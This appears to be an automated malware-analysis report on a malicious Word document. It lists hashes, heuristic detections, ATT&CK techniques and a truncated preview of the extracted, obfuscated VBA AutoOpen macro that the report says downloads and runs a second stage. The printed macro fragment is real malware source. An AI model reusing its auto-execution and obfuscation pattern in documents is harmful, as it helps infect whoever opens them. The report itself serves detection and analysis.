Office (OLE) malware analysis — malicious · f70097288b256239

MALICIOUS

Office (OLE)

111.0 KB Created: 2018-09-27 18:17:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: f6c21e915b8abe02b619741ba6eddbc7 SHA-1: 327b93abb90b2f86f5487b6444d913eec9b015f4 SHA-256: f70097288b256239abcba891caa2a5300d757fd28bdb45e5bc25f19098f2ed3c

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of malicious intent, suggesting it's designed to execute arbitrary commands. The macro's obfuscated nature and truncation prevent a full analysis of its payload, but its primary function appears to be downloading and executing a secondary stage.

Heuristics 6

ClamAV: Doc.Malware.00536d-6699675-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6699675-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17087 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17087 bytes
SHA-256: `60b29927852fa7ebeefb21914138a6c46dd57a8484a656c4f8eed4bbff61b41c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jILpnlKofP" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim QqsuN(2) QqsuN(0) = Left(fWbGz + bAjTjYBsNhuUSBYiZkIHdI + ImXStId, 119) + Left(zTwPP + MSdmdWlTkkStFLpOVvolqM + sEiKUKdQ, 793) + InStrRev(fQmjaYtn + mSHZBiYhmZVilZPHPpW + KwjLNMzY, GlakThu + RYJhtowdjkVRODtW + pAOBms) + InStrRev(waVzOfRB + GZOUsWQqIWPnXhXujHMdJ + PTCqA, EQlGUHs + cDSjmzQauHkitnnGzo + JcjHv) QqsuN(1) = InStrRev(PBvLk + zTSDcnFFVWqBhnHDvJDC + svfFoW, NnTotL + DaNkFauPIDhfQcijsaAN + UotBzt) + InStrRev(sGdoFP + kpjScqrCMKbucOWkrht + HQmaSc, XXqKjj + IBwljTWEPZiiUXRKLDFZa + EWlrjilG) + Right(ujfotWW + ooDkzOVZaCcYwAiMjrz + HwrmWSh, 682) + Right(ADAmmE + LfjDWnYtrJTKSdDwcw + TFAvnPNr, 152) Dim lsEDZG(2) lsEDZG(0) = InStrRev(YpZDMJoh + IpNEmNzoAIfzBGXOZdpd + DtComzh, zdRjF + DSwpsXCjDRTkFNViUv + AbbrC) + Left(ZRXTZW + qOVAHiNUCjREWKWQzO + ViSdzwQj, 932) lsEDZG(1) = InStrRev(fUwua + NHpWGJuAIDGhQAWoFi + WjlBf, QvwfBJ + YJPFwIcpHGDwYlNjSmUIj + sHJCuPI) + InStrRev(fqdUvutn + zarKjwFpMDATQUjwN + waFXGbIY, NKrCAza + JSpuiKOAZNrjhDdMqczQ + nVWRQW) Dim Zjoqn(1) Zjoqn(0) = InStrRev(BBKitfi + UQaFswBNGWiETRzchk + iBlML, YsOdnIs + ujndhiwwwPbhGoIvDGSk + hiUbQFb) + Right(hzzWaAI + PmKqmZSAwvHbBzzYVjqn + YrSwhuvR, 66) Dim GTsTlK(2) GTsTlK(0) = InStrRev(QRiMz + HRzVAttfVfanwfWcUOzDvB + LdCTk, pItPcvNi + FkPJkalqoOKOCUiIdBvduI + huhHjkFp) + Right(taCQdN + fuquLFijvKGVAEvphiZI + wwIFM, 472) + InStrRev(PdcGmi + GAJfKzsZMhXalirPI + XXblFX, RNNEcY + szDwfAquTXqbTHldmD + VbCuUKWT) + InStrRev(zzSFZoWj + lAuuWttzvLdUDiUdzXzqDi + OhzGG, HVjHYaR + lbUiOWFRJRTmQatiQtoF + wNoVjvi) GTsTlK(1) = InStr(EcKQlr + pwVNVLqwhmJkzVdJRqkOi + FNFJHn, zJUZb + diOwplGHYTiLvEiEFcloawV + MISrHTMB) + Left(fiwGYkn + MuahjWwrtozTJYFcarjDi + aGVNE, 733) + InStrRev(QDlbmVKw + LnMVqAiLiksfUvqzip + bsEJw, PtOvX + FQKMZPHmMtwRwpSJjk + CELEOrO) + InStr(QTqZpR + oTGsQzBvuYcOiPIIOVAQX + fziuJX, uRWtlEJ + wpTGlEvhJBFobsUEzAk + hkwGlW) Dim NLLni(1) NLLni(0) = Right(liAhJ + YElfWjOwfhGRKmmdSrYM + AMnbjuOj, 691) + Right(LOFDFwN + YwBzrvjzaArZUHnOlT + XHaIjaN, 854) + InStrRev(GbBLnjF + mInmmhjzLwunBQQVOFkioL + VJUDJ, kYkUoaz + hNlSZkvSkkcBaScNZdHo + RssXc) + Right(OUBaZA + bYlZCIiltWwjSmZQIsoXqp + hZXBSw, 557) Dim VPGui(2) VPGui(0) = InStrRev(iFvjw + CwjXsmAjitAZNrDTiEJW + whtktmS, VFiYkLDa + AhUtmBZcwXtaNwGKpva + smVdWHi) + InStrRev(wVsdoHi + qBacicqHwQqhtAAjP + UuPcrE, zboikz + HABjAinVvLkClJWh + CdXar) VPGui(1) = InStr(Btpisltj + TmhcGwfbtZDZOREWdGJ + lbGdrC, XmCvzk + fuPDPzUQYioJkQJqipP + fDjmLW) + InStrRev(IpwLth + HfNTUZMmsuptSrrXLRi + DQjTlFRT, WJCUE + tRTcfYpzFCJwWZQEtsBQb + rviNmmRU) + Right(vRXrqV + OJEjziEzNwsAshuPVSPsc + VBrNC, 437) + Left(MRkKzp + nDVfQCQKvGhhzRpXhMmKb + jkGWzaq, 705) Dim Zwiwk(2) Zwiwk(0) = InStrRev(cwKGVPti + qkOdKzrDTzZrBHPZwPR + mSAlOS, jozzL + wBGhIwHIawIPFZOs + zqdlXuqC) + Right(MVAazIj + jLsLQKuTjZiSzKdwkB + Grmmd, 661) Zwiwk(1) = Right(pBSGfHfM + AWTdAZcbmincYmUiXo + mjjAo, 846) + InStr(RVfBold + NBHjSCZuYVLiDQotTtkkjG + zWjWIc, nEVTh + FTXUjPNTEkYQYZFjcX + Miwuc) JRqHJIfXTqW (KeyString(hdHjbM + dzfphdo + 12 + 3 + 52 + tOPMMBV + prjPCHAJ) + WldzwBU + hGrithdr + KeyString(VblJj + rNwXo + 14 + 3 + 60 + NCzPOQK + iplzJqh) + OttlUvTz + HTRQQniV + vUXBoEM + jTiwSutU + OBbGNnR) Dim CtFrRi(2) CtFrRi(0) = InStrRev(MjwjQv + HifiOnRZmlsjJCLIFQwis + VjVAhKTK, bcSObrS + HoDSzdFmVIvmSYSlFaZVji + sudZjEv) + InStr(SOWXc + pUmoJuqwtZXiSWCMrVwbr + WAWWB, FjMvi + wmanfYZjfuUQjztszYvUbrwV + KntmNtj) + Left(LSlmErcj + HmUAlRCSzvjClrAiCnOY + iOmqdwL, 689) + InStr(zpnHUn + VtcPpozbwJhsPGDnLp + zBZwvEt, vwCKHP + XdXMaTdkXARAfadOPqX + kvluMGI) CtFrRi(1) = InStrRev(qoLdXZh + WjswOPjAiAJGocfijXS + nJrPr, jTcAO + jVWfFdqUodouuzMRjIEY + OaUqizUw) + InStr(MMrMlSSa + CrJhGlwGfbzOqrCEpIqGvm + rfQqiUWm, mjtCYs + PwAVjwVOdMkNvGQqpzc + UkjvL) Dim zwYWBw(2) zwYWBw(0) = InStr(TCIGsZmD + GzHBSZmwBwMstPmpYFo + WmpVzf, s ... (truncated)

SHA-256: 60b29927852fa7ebeefb21914138a6c46dd57a8484a656c4f8eed4bbff61b41c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jILpnlKofP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim QqsuN(2)
QqsuN(0) = Left(fWbGz + bAjTjYBsNhuUSBYiZkIHdI + ImXStId, 119) + Left(zTwPP + MSdmdWlTkkStFLpOVvolqM + sEiKUKdQ, 793) + InStrRev(fQmjaYtn + mSHZBiYhmZVilZPHPpW + KwjLNMzY, GlakThu + RYJhtowdjkVRODtW + pAOBms) + InStrRev(waVzOfRB + GZOUsWQqIWPnXhXujHMdJ + PTCqA, EQlGUHs + cDSjmzQauHkitnnGzo + JcjHv)
QqsuN(1) = InStrRev(PBvLk + zTSDcnFFVWqBhnHDvJDC + svfFoW, NnTotL + DaNkFauPIDhfQcijsaAN + UotBzt) + InStrRev(sGdoFP + kpjScqrCMKbucOWkrht + HQmaSc, XXqKjj + IBwljTWEPZiiUXRKLDFZa + EWlrjilG) + Right(ujfotWW + ooDkzOVZaCcYwAiMjrz + HwrmWSh, 682) + Right(ADAmmE + LfjDWnYtrJTKSdDwcw + TFAvnPNr, 152)
   Dim lsEDZG(2)
lsEDZG(0) = InStrRev(YpZDMJoh + IpNEmNzoAIfzBGXOZdpd + DtComzh, zdRjF + DSwpsXCjDRTkFNViUv + AbbrC) + Left(ZRXTZW + qOVAHiNUCjREWKWQzO + ViSdzwQj, 932)
lsEDZG(1) = InStrRev(fUwua + NHpWGJuAIDGhQAWoFi + WjlBf, QvwfBJ + YJPFwIcpHGDwYlNjSmUIj + sHJCuPI) + InStrRev(fqdUvutn + zarKjwFpMDATQUjwN + waFXGbIY, NKrCAza + JSpuiKOAZNrjhDdMqczQ + nVWRQW)
   Dim Zjoqn(1)
Zjoqn(0) = InStrRev(BBKitfi + UQaFswBNGWiETRzchk + iBlML, YsOdnIs + ujndhiwwwPbhGoIvDGSk + hiUbQFb) + Right(hzzWaAI + PmKqmZSAwvHbBzzYVjqn + YrSwhuvR, 66)
   Dim GTsTlK(2)
GTsTlK(0) = InStrRev(QRiMz + HRzVAttfVfanwfWcUOzDvB + LdCTk, pItPcvNi + FkPJkalqoOKOCUiIdBvduI + huhHjkFp) + Right(taCQdN + fuquLFijvKGVAEvphiZI + wwIFM, 472) + InStrRev(PdcGmi + GAJfKzsZMhXalirPI + XXblFX, RNNEcY + szDwfAquTXqbTHldmD + VbCuUKWT) + InStrRev(zzSFZoWj + lAuuWttzvLdUDiUdzXzqDi + OhzGG, HVjHYaR + lbUiOWFRJRTmQatiQtoF + wNoVjvi)
GTsTlK(1) = InStr(EcKQlr + pwVNVLqwhmJkzVdJRqkOi + FNFJHn, zJUZb + diOwplGHYTiLvEiEFcloawV + MISrHTMB) + Left(fiwGYkn + MuahjWwrtozTJYFcarjDi + aGVNE, 733) + InStrRev(QDlbmVKw + LnMVqAiLiksfUvqzip + bsEJw, PtOvX + FQKMZPHmMtwRwpSJjk + CELEOrO) + InStr(QTqZpR + oTGsQzBvuYcOiPIIOVAQX + fziuJX, uRWtlEJ + wpTGlEvhJBFobsUEzAk + hkwGlW)
   Dim NLLni(1)
NLLni(0) = Right(liAhJ + YElfWjOwfhGRKmmdSrYM + AMnbjuOj, 691) + Right(LOFDFwN + YwBzrvjzaArZUHnOlT + XHaIjaN, 854) + InStrRev(GbBLnjF + mInmmhjzLwunBQQVOFkioL + VJUDJ, kYkUoaz + hNlSZkvSkkcBaScNZdHo + RssXc) + Right(OUBaZA + bYlZCIiltWwjSmZQIsoXqp + hZXBSw, 557)
   Dim VPGui(2)
VPGui(0) = InStrRev(iFvjw + CwjXsmAjitAZNrDTiEJW + whtktmS, VFiYkLDa + AhUtmBZcwXtaNwGKpva + smVdWHi) + InStrRev(wVsdoHi + qBacicqHwQqhtAAjP + UuPcrE, zboikz + HABjAinVvLkClJWh + CdXar)
VPGui(1) = InStr(Btpisltj + TmhcGwfbtZDZOREWdGJ + lbGdrC, XmCvzk + fuPDPzUQYioJkQJqipP + fDjmLW) + InStrRev(IpwLth + HfNTUZMmsuptSrrXLRi + DQjTlFRT, WJCUE + tRTcfYpzFCJwWZQEtsBQb + rviNmmRU) + Right(vRXrqV + OJEjziEzNwsAshuPVSPsc + VBrNC, 437) + Left(MRkKzp + nDVfQCQKvGhhzRpXhMmKb + jkGWzaq, 705)
   Dim Zwiwk(2)
Zwiwk(0) = InStrRev(cwKGVPti + qkOdKzrDTzZrBHPZwPR + mSAlOS, jozzL + wBGhIwHIawIPFZOs + zqdlXuqC) + Right(MVAazIj + jLsLQKuTjZiSzKdwkB + Grmmd, 661)
Zwiwk(1) = Right(pBSGfHfM + AWTdAZcbmincYmUiXo + mjjAo, 846) + InStr(RVfBold + NBHjSCZuYVLiDQotTtkkjG + zWjWIc, nEVTh + FTXUjPNTEkYQYZFjcX + Miwuc)
JRqHJIfXTqW (KeyString(hdHjbM + dzfphdo + 12 + 3 + 52 + tOPMMBV + prjPCHAJ) + WldzwBU + hGrithdr + KeyString(VblJj + rNwXo + 14 + 3 + 60 + NCzPOQK + iplzJqh) + OttlUvTz + HTRQQniV + vUXBoEM + jTiwSutU + OBbGNnR)
   Dim CtFrRi(2)
CtFrRi(0) = InStrRev(MjwjQv + HifiOnRZmlsjJCLIFQwis + VjVAhKTK, bcSObrS + HoDSzdFmVIvmSYSlFaZVji + sudZjEv) + InStr(SOWXc + pUmoJuqwtZXiSWCMrVwbr + WAWWB, FjMvi + wmanfYZjfuUQjztszYvUbrwV + KntmNtj) + Left(LSlmErcj + HmUAlRCSzvjClrAiCnOY + iOmqdwL, 689) + InStr(zpnHUn + VtcPpozbwJhsPGDnLp + zBZwvEt, vwCKHP + XdXMaTdkXARAfadOPqX + kvluMGI)
CtFrRi(1) = InStrRev(qoLdXZh + WjswOPjAiAJGocfijXS + nJrPr, jTcAO + jVWfFdqUodouuzMRjIEY + OaUqizUw) + InStr(MMrMlSSa + CrJhGlwGfbzOqrCEpIqGvm + rfQqiUWm, mjtCYs + PwAVjwVOdMkNvGQqpzc + UkjvL)
   Dim zwYWBw(2)
zwYWBw(0) = InStr(TCIGsZmD + GzHBSZmwBwMstPmpYFo + WmpVzf, s
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.